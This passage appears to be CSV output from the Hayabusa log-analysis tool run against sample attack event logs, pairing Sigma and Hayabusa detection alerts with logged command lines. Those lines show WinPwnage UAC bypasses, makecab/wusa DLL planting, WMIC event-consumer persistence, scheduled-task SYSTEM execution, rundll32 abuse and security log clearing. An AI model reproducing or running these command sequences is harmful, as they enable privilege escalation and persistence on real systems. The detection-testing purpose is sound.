IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 